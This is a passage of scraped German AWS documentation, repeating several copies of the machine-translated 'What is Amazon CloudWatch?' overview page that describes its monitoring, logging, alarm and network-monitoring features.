Support Fälle. Enthält auch Links zu anderen hilfreichen Ressourcen wie Foren, technischen InformationenFAQs, Servicestatus und AWS Trusted Advisor. CloudWatch Amazon-Produktinformationen Die primäre Webseite für Informationen über Amazon CloudWatch. Kontakt Eine zentrale Anlaufstelle für Anfragen zu AWS Abrechnung, Konto, Veranstaltungen, Missbrauch usw. JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Einrichten Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html#cloudwatch-APM-overview | Was ist Amazon CloudWatch? - Amazon CloudWatch Was ist Amazon CloudWatch? - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog CloudWatch Netzwerk-Überwachung Fakturierung und Kosten Ressourcen Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Was ist Amazon CloudWatch? Amazon CloudWatch überwacht Ihre Amazon Web Services (AWS) -Ressourcen und die Anwendungen, auf denen Sie laufen, AWS in Echtzeit und bietet zahlreiche Tools, mit denen Sie die Leistung, den Betriebszustand und die Ressourcennutzung Ihrer Anwendungen systemweit beobachten können. Themen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog Netzwerk- und Internetüberwachung Fakturierung und Kosten CloudWatch Amazon-Ressourcen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Metriken erfassen und verfolgen wichtige Leistungsdaten in benutzerdefinierten Intervallen. Viele AWS Dienste melden Metriken automatisch an CloudWatch, und Sie können auch benutzerdefinierte Messwerte in CloudWatch Ihren Anwendungen veröffentlichen . Dashboards bieten eine einheitliche Ansicht Ihrer Ressourcen und Anwendungen mit Visualisierungen Ihrer Metriken und Protokolle an einem einzigen Ort. Sie können Dashboards auch konten- und regionsübergreifend teilen , um den Überblick über Ihre Abläufe zu verbessern. CloudWatch bietet kuratierte automatische Dashboards für viele AWS Dienste, sodass Sie sie nicht selbst erstellen müssen. Sie können Alarme einrichten, die Messwerte kontinuierlich anhand benutzerdefinierter CloudWatch Schwellenwerte überwachen. Sie können Sie automatisch vor Überschreitungen der Schwellenwerte warnen und auch automatisch auf Änderungen im Verhalten Ihrer Ressourcen reagieren, indem sie automatisierte Aktionen auslösen . Application Performance Monitoring (APM) Mit Application Signals können Sie die wichtigsten Leistungsindikatoren Ihrer Anwendungen wie Latenz, Fehlerraten und Anforderungsraten automatisch erkennen und überwachen, ohne dass manuelle Instrumentierung oder Codeänderungen erforderlich sind. Application Signals bietet auch kuratierte Dashboards, sodass Sie mit einem Minimum an Einrichtung mit der Überwachung beginnen können. CloudWatch Synthetics ergänzt dies, indem es Ihnen ermöglicht, Ihre Endgeräte proaktiv zu überwachen und APIs konfigurierbare Skripts, sogenannte Canaries , zu verwenden, die das Benutzerverhalten simulieren und Sie auf Verfügbarkeitsprobleme oder Leistungseinbußen aufmerksam machen, bevor sie sich auf echte Benutzer auswirken. Sie können CloudWatch RUM auch verwenden, um Leistungsdaten aus echten Benutzersitzungen zu sammeln. Verwenden Sie Service Level Objectives (SLOs) , CloudWatch um spezifische Zuverlässigkeitsziele für Ihre Anwendungen zu definieren, nachzuverfolgen und entsprechende Warnmeldungen zu erstellen. So können Sie Ihre Verpflichtungen zur Servicequalität einhalten, indem Sie Fehlerbudgets festlegen und die SLO-Einhaltung im Laufe der Zeit überwachen. Überwachung der Infrastruktur Viele AWS Dienste senden grundlegende Kennzahlen automatisch und CloudWatch kostenlos an. Services, die Metriken senden, sind hier aufgelistet . Darüber hinaus CloudWatch bietet es zusätzliche Überwachungsfunktionen für mehrere wichtige Teile der AWS Infrastruktur: Mit Database Insights können Sie die Leistungsmetriken von Datenbanken in Echtzeit überwachen, die Leistung von SQL-Abfragen analysieren und Probleme beim Laden von Datenbanken für AWS -Datenbankservices beheben. Lambda Insights bietet Metriken auf Systemebene für Lambda-Funktionen, darunter die Überwachung der Speicher- und CPU-Auslastung sowie die Erkennung und Analyse von Kaltstarts. Mit Container Insights können Sie Metriken aus containerisierten Anwendungen auf Amazon ECS-Clustern, Amazon EKS-Clustern und selbstverwalteten Kubernetes-Clustern auf Amazon sammeln und analysieren. EC2 Protokolle sammeln, speichern und abfragen CloudWatch Logs bietet eine Reihe leistungsstarker Funktionen für eine umfassende Protokollverwaltung und -analyse. Von AWS Diensten und benutzerdefinierten Anwendungen aufgenommene Protokolle werden zur einfachen Organisation in Protokollgruppen und Streams gespeichert. Verwenden Sie CloudWatch Logs Insights , um interaktive, schnelle Abfragen Ihrer Protokolldaten durchzuführen. Sie haben die Wahl zwischen drei Abfragesprachen, darunter SQL und PPL. Verwenden Sie die Erkennung von Protokollausreißern , um ungewöhnliche Muster in Protokollereignissen in einer Protokollgruppe zu finden, die auf Probleme hinweisen können. Erstellen Sie Metrikfilter , um numerische Werte aus Protokollen zu extrahieren und CloudWatch Metriken zu generieren, die Sie für Benachrichtigungen und Dashboards verwenden können. Richten Sie Abonnementfilter ein, um Protokolle in Echtzeit zu verarbeiten und zu analysieren oder sie an andere Services wie Amazon S3 oder Firehose weiterzuleiten. Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Verwenden Sie den CloudWatch Agenten , um detaillierte Systemmetriken zu Prozessen, CPU, Arbeitsspeicher, Festplattennutzung und Netzwerkleistung von Ihren Flotten von EC2 Amazon-Instances und lokalen Servern zu sammeln. Sie können auch benutzerdefinierte Metriken aus Ihren Anwendungen sammeln und überwachen, Protokolle aus mehreren Quellen zusammenfassen und Alarme auf der Grundlage der gesammelten Daten konfigurieren. Sie können den Agenten auch verwenden, um GPU-Metriken zu sammeln. Der Agent unterstützt sowohl Windows- als auch Linux-Betriebssysteme und kann zur zentralen Konfigurationsverwaltung in Systems Manager integriert werden. Kontoübergreifende Überwachung CloudWatch Mit der kontenübergreifenden Observability können Sie ein zentrales Überwachungskonto einrichten, um Anwendungen zu überwachen und Fehler zu beheben, die sich über mehrere Konten erstrecken. Über das zentrale Konto können Sie Metriken, Protokolle und Ablaufverfolgungen von Quellkonten in Ihrer gesamten Organisation einsehen. Dieser zentralisierte Ansatz ermöglicht es Ihnen, kontenübergreifende Dashboards zu erstellen, Alarme einzurichten, die Metriken mehrerer Konten zu überwachen, und Ursachenanalysen über Kontogrenzen hinweg durchzuführen. Mit der CloudWatch kontenübergreifenden Observability können Sie Quellkonten entweder einzeln oder automatisch miteinander verknüpfen. AWS Organizations Lösungskatalog CloudWatch bietet einen Katalog leicht verfügbarer Konfigurationen, mit denen Sie schnell die Überwachung verschiedener AWS Dienste und gängiger Workloads wie Java Virtual Machines (JVM), NVIDIA GPU, Apache Kafka, Apache Tomcat und NGINX implementieren können. Diese Lösungen bieten gezielte Anleitungen, einschließlich Anweisungen zur Installation und Konfiguration des CloudWatch Agenten, zur Bereitstellung vordefinierter benutzerdefinierter Dashboards und zur Einrichtung entsprechender Alarme. Netzwerk- und Internetüberwachung CloudWatch bietet umfassende Netzwerk- und Internetüberwachungsfunktionen über CloudWatch Network Monitoring. Internet Monitor verwendet AWS globale Netzwerkdaten, um die Internetleistung und Verfügbarkeit zwischen Ihren Anwendungen und Endbenutzern zu analysieren. Mit einem Internetmonitor können Sie erhöhte Latenzzeiten oder regionale Störungen, die sich auf Ihre Kunden auswirken, erkennen oder Benachrichtigungen erhalten. Internetmonitore analysieren Ihre VPC-Flussprotokolle, um automatisierte Einblicke in die Muster und die Leistung des Netzwerkverkehrs zu erhalten. Sie können ebenfalls Vorschläge dazu erhalten, wie Sie die Anwendungsleistung für Ihre Clients optimieren können. Network Flow Monitor zeigt Informationen zur Netzwerkleistung an, die von einfachen Softwareagenten gesammelt wurden, die Sie auf Ihren Instances installieren. Mithilfe eines Flow Monitors können Sie schnell den Paketverlust und die Latenz Ihrer Netzwerkverbindungen über einen von Ihnen festgelegten Zeitraum visualisieren. Jeder Monitor generiert außerdem einen Netzwerkstatusindikator (Network Health Indicator, NHI), der Ihnen mitteilt, ob während des von Ihnen untersuchten Zeitraums AWS Netzwerkprobleme bei den Netzwerkströmen aufgetreten sind, die von Ihrem Monitor aufgezeichnet wurden. Wenn Sie eine Verbindung herstellen Direct Connect, können Sie synthetische Monitore in Network Synthetic Monitor verwenden, um die Netzwerkkonnektivität proaktiv zu überwachen, indem Sie synthetische Tests zwischen einer VPC und lokalen Endpunkten ausführen. Wenn Sie einen synthetischen Monitor erstellen, geben Sie Tests an, indem Sie ein VPC-Subnetz und lokale IP-Adressen angeben. AWS erstellt und verwaltet die Infrastruktur im Hintergrund, die für die Durchführung von Messungen der Umlaufzeit und des Paketverlusts mit den Sonden erforderlich ist. Diese Tests erkennen Probleme mit Konnektivität, DNS und Latenz, bevor sie sich auf Ihre Anwendungen auswirken, sodass Sie Maßnahmen ergreifen können, um die Erfahrung Ihrer Endbenutzer zu verbessern. Fakturierung und Kosten Vollständige Informationen zu den CloudWatch Preisen finden Sie unter CloudWatch Amazon-Preise . Informationen, die Ihnen helfen können, Ihre Rechnung zu analysieren und möglicherweise Kosten zu optimieren und zu senken, finden Sie unter CloudWatch Kosten analysieren, optimieren und reduzieren . CloudWatch Amazon-Ressourcen Die folgenden verwandten Ressourcen bieten Ihnen nützliche Informationen für die Arbeit mit diesem Service. Ressource Description Amazon CloudWatch FAQs Die Webseite „Häufig gestellte Fragen” deckt alle wichtigsten Fragen ab, die Entwickler zu diesem Produkt gestellt haben. AWS Entwicklerzentrum Ein zentraler Ausgangspunkt, um Dokumentation, Codebeispiele, Versionshinweise und andere Informationen zu finden, mit denen Sie innovative Anwendungen entwickeln können AWS. AWS-Managementkonsole Mit der Konsole können Sie die meisten Funktionen von Amazon CloudWatch und verschiedenen anderen AWS Angeboten ohne Programmierung ausführen. CloudWatch Amazon-Diskussionsforen Community-basiertes Forum für Entwickler zur Diskussion technischer Fragen zu Amazon. CloudWatch AWS Support Die zentrale Anlaufstelle für die Erstellung und Verwaltung Ihrer AWS Support Fälle. Enthält auch Links zu anderen hilfreichen Ressourcen wie Foren, technischen InformationenFAQs, Servicestatus und AWS Trusted Advisor. CloudWatch Amazon-Produktinformationen Die primäre Webseite für Informationen über Amazon CloudWatch. Kontakt Eine zentrale Anlaufstelle für Anfragen zu AWS Abrechnung, Konto, Veranstaltungen, Missbrauch usw. JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Einrichten Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html#cloudwatch-monitoring-overview | Was ist Amazon CloudWatch? - Amazon CloudWatch Was ist Amazon CloudWatch? - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog CloudWatch Netzwerk-Überwachung Fakturierung und Kosten Ressourcen Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Was ist Amazon CloudWatch? Amazon CloudWatch überwacht Ihre Amazon Web Services (AWS) -Ressourcen und die Anwendungen, auf denen Sie laufen, AWS in Echtzeit und bietet zahlreiche Tools, mit denen Sie die Leistung, den Betriebszustand und die Ressourcennutzung Ihrer Anwendungen systemweit beobachten können. Themen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog Netzwerk- und Internetüberwachung Fakturierung und Kosten CloudWatch Amazon-Ressourcen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Metriken erfassen und verfolgen wichtige Leistungsdaten in benutzerdefinierten Intervallen. Viele AWS Dienste melden Metriken automatisch an CloudWatch, und Sie können auch benutzerdefinierte Messwerte in CloudWatch Ihren Anwendungen veröffentlichen . Dashboards bieten eine einheitliche Ansicht Ihrer Ressourcen und Anwendungen mit Visualisierungen Ihrer Metriken und Protokolle an einem einzigen Ort. Sie können Dashboards auch konten- und regionsübergreifend teilen , um den Überblick über Ihre Abläufe zu verbessern. CloudWatch bietet kuratierte automatische Dashboards für viele AWS Dienste, sodass Sie sie nicht selbst erstellen müssen. Sie können Alarme einrichten, die Messwerte kontinuierlich anhand benutzerdefinierter CloudWatch Schwellenwerte überwachen. Sie können Sie automatisch vor Überschreitungen der Schwellenwerte warnen und auch automatisch auf Änderungen im Verhalten Ihrer Ressourcen reagieren, indem sie automatisierte Aktionen auslösen . Application Performance Monitoring (APM) Mit Application Signals können Sie die wichtigsten Leistungsindikatoren Ihrer Anwendungen wie Latenz, Fehlerraten und Anforderungsraten automatisch erkennen und überwachen, ohne dass manuelle Instrumentierung oder Codeänderungen erforderlich sind. Application Signals bietet auch kuratierte Dashboards, sodass Sie mit einem Minimum an Einrichtung mit der Überwachung beginnen können. CloudWatch Synthetics ergänzt dies, indem es Ihnen ermöglicht, Ihre Endgeräte proaktiv zu überwachen und APIs konfigurierbare Skripts, sogenannte Canaries , zu verwenden, die das Benutzerverhalten simulieren und Sie auf Verfügbarkeitsprobleme oder Leistungseinbußen aufmerksam machen, bevor sie sich auf echte Benutzer auswirken. Sie können CloudWatch RUM auch verwenden, um Leistungsdaten aus echten Benutzersitzungen zu sammeln. Verwenden Sie Service Level Objectives (SLOs) , CloudWatch um spezifische Zuverlässigkeitsziele für Ihre Anwendungen zu definieren, nachzuverfolgen und entsprechende Warnmeldungen zu erstellen. So können Sie Ihre Verpflichtungen zur Servicequalität einhalten, indem Sie Fehlerbudgets festlegen und die SLO-Einhaltung im Laufe der Zeit überwachen. Überwachung der Infrastruktur Viele AWS Dienste senden grundlegende Kennzahlen automatisch und CloudWatch kostenlos an. Services, die Metriken senden, sind hier aufgelistet . Darüber hinaus CloudWatch bietet es zusätzliche Überwachungsfunktionen für mehrere wichtige Teile der AWS Infrastruktur: Mit Database Insights können Sie die Leistungsmetriken von Datenbanken in Echtzeit überwachen, die Leistung von SQL-Abfragen analysieren und Probleme beim Laden von Datenbanken für AWS -Datenbankservices beheben. Lambda Insights bietet Metriken auf Systemebene für Lambda-Funktionen, darunter die Überwachung der Speicher- und CPU-Auslastung sowie die Erkennung und Analyse von Kaltstarts. Mit Container Insights können Sie Metriken aus containerisierten Anwendungen auf Amazon ECS-Clustern, Amazon EKS-Clustern und selbstverwalteten Kubernetes-Clustern auf Amazon sammeln und analysieren. EC2 Protokolle sammeln, speichern und abfragen CloudWatch Logs bietet eine Reihe leistungsstarker Funktionen für eine umfassende Protokollverwaltung und -analyse. Von AWS Diensten und benutzerdefinierten Anwendungen aufgenommene Protokolle werden zur einfachen Organisation in Protokollgruppen und Streams gespeichert. Verwenden Sie CloudWatch Logs Insights , um interaktive, schnelle Abfragen Ihrer Protokolldaten durchzuführen. Sie haben die Wahl zwischen drei Abfragesprachen, darunter SQL und PPL. Verwenden Sie die Erkennung von Protokollausreißern , um ungewöhnliche Muster in Protokollereignissen in einer Protokollgruppe zu finden, die auf Probleme hinweisen können. Erstellen Sie Metrikfilter , um numerische Werte aus Protokollen zu extrahieren und CloudWatch Metriken zu generieren, die Sie für Benachrichtigungen und Dashboards verwenden können. Richten Sie Abonnementfilter ein, um Protokolle in Echtzeit zu verarbeiten und zu analysieren oder sie an andere Services wie Amazon S3 oder Firehose weiterzuleiten. Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Verwenden Sie den CloudWatch Agenten , um detaillierte Systemmetriken zu Prozessen, CPU, Arbeitsspeicher, Festplattennutzung und Netzwerkleistung von Ihren Flotten von EC2 Amazon-Instances und lokalen Servern zu sammeln. Sie können auch benutzerdefinierte Metriken aus Ihren Anwendungen sammeln und überwachen, Protokolle aus mehreren Quellen zusammenfassen und Alarme auf der Grundlage der gesammelten Daten konfigurieren. Sie können den Agenten auch verwenden, um GPU-Metriken zu sammeln. Der Agent unterstützt sowohl Windows- als auch Linux-Betriebssysteme und kann zur zentralen Konfigurationsverwaltung in Systems Manager integriert werden. Kontoübergreifende Überwachung CloudWatch Mit der kontenübergreifenden Observability können Sie ein zentrales Überwachungskonto einrichten, um Anwendungen zu überwachen und Fehler zu beheben, die sich über mehrere Konten erstrecken. Über das zentrale Konto können Sie Metriken, Protokolle und Ablaufverfolgungen von Quellkonten in Ihrer gesamten Organisation einsehen. Dieser zentralisierte Ansatz ermöglicht es Ihnen, kontenübergreifende Dashboards zu erstellen, Alarme einzurichten, die Metriken mehrerer Konten zu überwachen, und Ursachenanalysen über Kontogrenzen hinweg durchzuführen. Mit der CloudWatch kontenübergreifenden Observability können Sie Quellkonten entweder einzeln oder automatisch miteinander verknüpfen. AWS Organizations Lösungskatalog CloudWatch bietet einen Katalog leicht verfügbarer Konfigurationen, mit denen Sie schnell die Überwachung verschiedener AWS Dienste und gängiger Workloads wie Java Virtual Machines (JVM), NVIDIA GPU, Apache Kafka, Apache Tomcat und NGINX implementieren können. Diese Lösungen bieten gezielte Anleitungen, einschließlich Anweisungen zur Installation und Konfiguration des CloudWatch Agenten, zur Bereitstellung vordefinierter benutzerdefinierter Dashboards und zur Einrichtung entsprechender Alarme. Netzwerk- und Internetüberwachung CloudWatch bietet umfassende Netzwerk- und Internetüberwachungsfunktionen über CloudWatch Network Monitoring. Internet Monitor verwendet AWS globale Netzwerkdaten, um die Internetleistung und Verfügbarkeit zwischen Ihren Anwendungen und Endbenutzern zu analysieren. Mit einem Internetmonitor können Sie erhöhte Latenzzeiten oder regionale Störungen, die sich auf Ihre Kunden auswirken, erkennen oder Benachrichtigungen erhalten. Internetmonitore analysieren Ihre VPC-Flussprotokolle, um automatisierte Einblicke in die Muster und die Leistung des Netzwerkverkehrs zu erhalten. Sie können ebenfalls Vorschläge dazu erhalten, wie Sie die Anwendungsleistung für Ihre Clients optimieren können. Network Flow Monitor zeigt Informationen zur Netzwerkleistung an, die von einfachen Softwareagenten gesammelt wurden, die Sie auf Ihren Instances installieren. Mithilfe eines Flow Monitors können Sie schnell den Paketverlust und die Latenz Ihrer Netzwerkverbindungen über einen von Ihnen festgelegten Zeitraum visualisieren. Jeder Monitor generiert außerdem einen Netzwerkstatusindikator (Network Health Indicator, NHI), der Ihnen mitteilt, ob während des von Ihnen untersuchten Zeitraums AWS Netzwerkprobleme bei den Netzwerkströmen aufgetreten sind, die von Ihrem Monitor aufgezeichnet wurden. Wenn Sie eine Verbindung herstellen Direct Connect, können Sie synthetische Monitore in Network Synthetic Monitor verwenden, um die Netzwerkkonnektivität proaktiv zu überwachen, indem Sie synthetische Tests zwischen einer VPC und lokalen Endpunkten ausführen. Wenn Sie einen synthetischen Monitor erstellen, geben Sie Tests an, indem Sie ein VPC-Subnetz und lokale IP-Adressen angeben. AWS erstellt und verwaltet die Infrastruktur im Hintergrund, die für die Durchführung von Messungen der Umlaufzeit und des Paketverlusts mit den Sonden erforderlich ist. Diese Tests erkennen Probleme mit Konnektivität, DNS und Latenz, bevor sie sich auf Ihre Anwendungen auswirken, sodass Sie Maßnahmen ergreifen können, um die Erfahrung Ihrer Endbenutzer zu verbessern. Fakturierung und Kosten Vollständige Informationen zu den CloudWatch Preisen finden Sie unter CloudWatch Amazon-Preise . Informationen, die Ihnen helfen können, Ihre Rechnung zu analysieren und möglicherweise Kosten zu optimieren und zu senken, finden Sie unter CloudWatch Kosten analysieren, optimieren und reduzieren . CloudWatch Amazon-Ressourcen Die folgenden verwandten Ressourcen bieten Ihnen nützliche Informationen für die Arbeit mit diesem Service. Ressource Description Amazon CloudWatch FAQs Die Webseite „Häufig gestellte Fragen” deckt alle wichtigsten Fragen ab, die Entwickler zu diesem Produkt gestellt haben. AWS Entwicklerzentrum Ein zentraler Ausgangspunkt, um Dokumentation, Codebeispiele, Versionshinweise und andere Informationen zu finden, mit denen Sie innovative Anwendungen entwickeln können AWS. AWS-Managementkonsole Mit der Konsole können Sie die meisten Funktionen von Amazon CloudWatch und verschiedenen anderen AWS Angeboten ohne Programmierung ausführen. CloudWatch Amazon-Diskussionsforen Community-basiertes Forum für Entwickler zur Diskussion technischer Fragen zu Amazon. CloudWatch AWS Support Die zentrale Anlaufstelle für die Erstellung und Verwaltung Ihrer AWS Support Fälle. Enthält auch Links zu anderen hilfreichen Ressourcen wie Foren, technischen InformationenFAQs, Servicestatus und AWS Trusted Advisor. CloudWatch Amazon-Produktinformationen Die primäre Webseite für Informationen über Amazon CloudWatch. Kontakt Eine zentrale Anlaufstelle für Anfragen zu AWS Abrechnung, Konto, Veranstaltungen, Missbrauch usw. JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Einrichten Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html#cloudwatch-cross-account-overview | Was ist Amazon CloudWatch? - Amazon CloudWatch Was ist Amazon CloudWatch? - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog CloudWatch Netzwerk-Überwachung Fakturierung und Kosten Ressourcen Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Was ist Amazon CloudWatch? Amazon CloudWatch überwacht Ihre Amazon Web Services (AWS) -Ressourcen und die Anwendungen, auf denen Sie laufen, AWS in Echtzeit und bietet zahlreiche Tools, mit denen Sie die Leistung, den Betriebszustand und die Ressourcennutzung Ihrer Anwendungen systemweit beobachten können. Themen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog Netzwerk- und Internetüberwachung Fakturierung und Kosten CloudWatch Amazon-Ressourcen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Metriken erfassen und verfolgen wichtige Leistungsdaten in benutzerdefinierten Intervallen. Viele AWS Dienste melden Metriken automatisch an CloudWatch, und Sie können auch benutzerdefinierte Messwerte in CloudWatch Ihren Anwendungen veröffentlichen . Dashboards bieten eine einheitliche Ansicht Ihrer Ressourcen und Anwendungen mit Visualisierungen Ihrer Metriken und Protokolle an einem einzigen Ort. Sie können Dashboards auch konten- und regionsübergreifend teilen , um den Überblick über Ihre Abläufe zu verbessern. CloudWatch bietet kuratierte automatische Dashboards für viele AWS Dienste, sodass Sie sie nicht selbst erstellen müssen. Sie können Alarme einrichten, die Messwerte kontinuierlich anhand benutzerdefinierter CloudWatch Schwellenwerte überwachen. Sie können Sie automatisch vor Überschreitungen der Schwellenwerte warnen und auch automatisch auf Änderungen im Verhalten Ihrer Ressourcen reagieren, indem sie automatisierte Aktionen auslösen . Application Performance Monitoring (APM) Mit Application Signals können Sie die wichtigsten Leistungsindikatoren Ihrer Anwendungen wie Latenz, Fehlerraten und Anforderungsraten automatisch erkennen und überwachen, ohne dass manuelle Instrumentierung oder Codeänderungen erforderlich sind. Application Signals bietet auch kuratierte Dashboards, sodass Sie mit einem Minimum an Einrichtung mit der Überwachung beginnen können. CloudWatch Synthetics ergänzt dies, indem es Ihnen ermöglicht, Ihre Endgeräte proaktiv zu überwachen und APIs konfigurierbare Skripts, sogenannte Canaries , zu verwenden, die das Benutzerverhalten simulieren und Sie auf Verfügbarkeitsprobleme oder Leistungseinbußen aufmerksam machen, bevor sie sich auf echte Benutzer auswirken. Sie können CloudWatch RUM auch verwenden, um Leistungsdaten aus echten Benutzersitzungen zu sammeln. Verwenden Sie Service Level Objectives (SLOs) , CloudWatch um spezifische Zuverlässigkeitsziele für Ihre Anwendungen zu definieren, nachzuverfolgen und entsprechende Warnmeldungen zu erstellen. So können Sie Ihre Verpflichtungen zur Servicequalität einhalten, indem Sie Fehlerbudgets festlegen und die SLO-Einhaltung im Laufe der Zeit überwachen. Überwachung der Infrastruktur Viele AWS Dienste senden grundlegende Kennzahlen automatisch und CloudWatch kostenlos an. Services, die Metriken senden, sind hier aufgelistet . Darüber hinaus CloudWatch bietet es zusätzliche Überwachungsfunktionen für mehrere wichtige Teile der AWS Infrastruktur: Mit Database Insights können Sie die Leistungsmetriken von Datenbanken in Echtzeit überwachen, die Leistung von SQL-Abfragen analysieren und Probleme beim Laden von Datenbanken für AWS -Datenbankservices beheben. Lambda Insights bietet Metriken auf Systemebene für Lambda-Funktionen, darunter die Überwachung der Speicher- und CPU-Auslastung sowie die Erkennung und Analyse von Kaltstarts. Mit Container Insights können Sie Metriken aus containerisierten Anwendungen auf Amazon ECS-Clustern, Amazon EKS-Clustern und selbstverwalteten Kubernetes-Clustern auf Amazon sammeln und analysieren. EC2 Protokolle sammeln, speichern und abfragen CloudWatch Logs bietet eine Reihe leistungsstarker Funktionen für eine umfassende Protokollverwaltung und -analyse. Von AWS Diensten und benutzerdefinierten Anwendungen aufgenommene Protokolle werden zur einfachen Organisation in Protokollgruppen und Streams gespeichert. Verwenden Sie CloudWatch Logs Insights , um interaktive, schnelle Abfragen Ihrer Protokolldaten durchzuführen. Sie haben die Wahl zwischen drei Abfragesprachen, darunter SQL und PPL. Verwenden Sie die Erkennung von Protokollausreißern , um ungewöhnliche Muster in Protokollereignissen in einer Protokollgruppe zu finden, die auf Probleme hinweisen können. Erstellen Sie Metrikfilter , um numerische Werte aus Protokollen zu extrahieren und CloudWatch Metriken zu generieren, die Sie für Benachrichtigungen und Dashboards verwenden können. Richten Sie Abonnementfilter ein, um Protokolle in Echtzeit zu verarbeiten und zu analysieren oder sie an andere Services wie Amazon S3 oder Firehose weiterzuleiten. Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Verwenden Sie den CloudWatch Agenten , um detaillierte Systemmetriken zu Prozessen, CPU, Arbeitsspeicher, Festplattennutzung und Netzwerkleistung von Ihren Flotten von EC2 Amazon-Instances und lokalen Servern zu sammeln. Sie können auch benutzerdefinierte Metriken aus Ihren Anwendungen sammeln und überwachen, Protokolle aus mehreren Quellen zusammenfassen und Alarme auf der Grundlage der gesammelten Daten konfigurieren. Sie können den Agenten auch verwenden, um GPU-Metriken zu sammeln. Der 